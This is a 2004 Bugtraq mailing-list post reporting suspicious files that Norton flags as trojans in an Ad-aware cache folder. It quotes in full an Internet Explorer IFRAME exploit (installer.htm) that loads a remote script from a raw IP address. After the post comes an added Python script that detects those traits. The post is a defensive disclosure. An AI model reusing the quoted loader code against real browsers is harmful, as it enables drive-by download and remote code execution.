Message-ID: <LIEKJLEBDKKNBDDGIJAAAEBECFAA.fedhead@rogers.com>
Date: Sun, 20 Jun 2004 10:36:16 -0400
From: "fedhead" <fedhead@...ers.com>
To: "bugtraq" <bugtraq@...urityfocus.com>
Subject: Unusual Activity in Ad-aware 6 Personal, Build 6.181


Sorry about my previous post, Norton picked up the html code and filtered my
e-mail. Here is the original post without the html flags.

Hello,

My apologies if I am posting in the wrong list but I am not sure if this is
a known issue in Ad-aware or if this even is an issue with Ad-aware.

I have written a script to run ad-aware to scan the registry and files from
Windows XP Scheduled tasks:

rem Scan the local registry
"C:\Program Files\Lavasoft\Ad-Aware 6\Ad-Aware.exe" +c +1 +A

rem Scan the file system:
"C:\Program Files\Lavasoft\Ad-Aware 6\Ad-Aware.exe" C:\ +a +1 +A

Seems benign enough. Every night when it runs, after the first scan of the
registry, it creates four files in the C:\Program Files\Lavasoft\Ad-Aware
6\cache folder which Norton AV catches as trojan scripts:

exploit.chm
installer.htm
shellscript.js
shellscript_loader.js

In installer.htm, it appears to use one of the IE IFRAME exploits to
download the JavaScript files.

cat installer.htm

<script language="Javascript">

    function InjectedDuringRedirection(){

 showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialo
gHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT
SRC=\\'http://62.131.86.111/security/idiots/repro/shellscript_loader.js\\'><
\/script>'";
    }

</script>

<script language="javascript">


setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
    setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
    document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.jsp"
WIDTH=200 HEIGHT=200></IFRAME>');

</script>


The most unusual part is that it happens at the end of the registry scan in
Ad-aware. A Google search doesn't turn up any relation between this exploit
and Ad-aware so it could be something unique to my system but at this point
I am at a loss as to what it could be.

I also have an 'image' of my Windows XP Pro install in a VMware where I have
been testing SP2 and the files also exist there as well.

Any info would be appreciated.

Thanks,
Matt
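
Added example, not part of the original post and not code from Ad-aware or Norton: a Python triage script that flags the traits visible in the quoted installer.htm (off-screen modal dialog, a javascript: URL assigned to a location, execScript into a frame, a script loaded from a raw IP address) and can be pointed at a folder such as the cache directory mentioned above. The rule names, the threshold of three co-occurring traits, and the embedded sample are assumptions constructed for this example.

```python
import re
from pathlib import Path

# Heuristics derived from traits visible in the quoted installer.htm listing.
RULES = {
    "offscreen_modal_dialog": re.compile(
        r"showModalDialog\s*\([^)]{0,300}?dialog(?:Top|Left)\s*:\s*-\d{3,}", re.I),
    "javascript_url_to_location": re.compile(
        r"\.location\s*=\s*[\"']javascript:", re.I),
    "execscript_into_frame": re.compile(r"\w+\.execScript\s*\(", re.I),
    "script_src_raw_ip": re.compile(
        r"src\s*=\s*[\\'\"]*https?://\d{1,3}(?:\.\d{1,3}){3}[/:'\"\\]", re.I),
    "iframe_via_document_write": re.compile(
        r"document\.write\s*\(\s*['\"]<iframe", re.I),
}

def triage(text, threshold=3):
    """Return matched rule names; flag the text when enough traits co-occur."""
    # Drop line breaks so tokens split by hard wrapping (mail archives) still match.
    flat = re.sub(r"\r?\n", "", text)
    hits = sorted(name for name, rx in RULES.items() if rx.search(flat))
    return {"hits": hits, "suspicious": len(hits) >= threshold}

def scan_folder(folder, suffixes=(".htm", ".html", ".js")):
    """Triage each script/HTML file under folder; returns {file name: result}."""
    results = {}
    for path in sorted(Path(folder).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            results[path.name] = triage(path.read_text(errors="replace"))
    return results

# Constructed, non-functional sample (documentation address 192.0.2.10),
# hard-wrapped mid-token on purpose.
SAMPLE_WRAPPED = (
    "<script>\n"
    "showModalDi\n"
    "alog('a.htm',window,\"dialogTop:-10000;dialogLeft:-10000;\")"
    ".location=\"javascript:void(0)\";\n"
    "frame1.execScript('noop()');\n"
    "</script>\n"
    "<SCRIPT SRC='http://192.0.2.10/a.js'></script>\n"
)
SAMPLE_BENIGN = '<script src="/static/app.js"></script><iframe src="help.htm"></iframe>'

if __name__ == "__main__":
    print(triage(SAMPLE_WRAPPED))
    print(triage(SAMPLE_BENIGN))
```

Any single rule also matches ordinary pages, which is why the verdict depends on several traits appearing together.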
